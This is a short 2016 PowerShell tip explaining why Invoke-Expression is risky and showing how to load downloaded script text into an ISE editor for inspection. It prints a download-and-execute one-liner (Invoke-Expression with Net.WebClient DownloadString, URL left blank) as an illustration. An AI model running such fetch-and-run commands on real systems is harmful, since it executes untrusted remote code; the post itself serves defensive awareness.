Smuggling In PowerShell Code

by Aug 24, 2016

PowerShell 2

There is a good reason why Invoke-Expression is considered risky. This cmdlet executes whatever string it gets, and attackers can download malicious code from the Internet, bypass script analysis, and execute it. Here is a benign example of what a simple one-liner can turn into, written by Lee Holmes from the PowerShell team:

Invoke-Expression (New-Object Net.WebClient).DownloadString('')

If you don’t trust this code, you might want to remove Invoke-Expression and view the source code that is downloaded from the web. If you are working with the PowerShell ISE, you can use this code to download the source code directly into an editor tab:

$file = $psise.CurrentPowerShellTab.Files.Add()
$file.Editor.Text = (New-Object Net.WebClient).DownloadString('')

Twitter This Tip! ReTweet this Tip!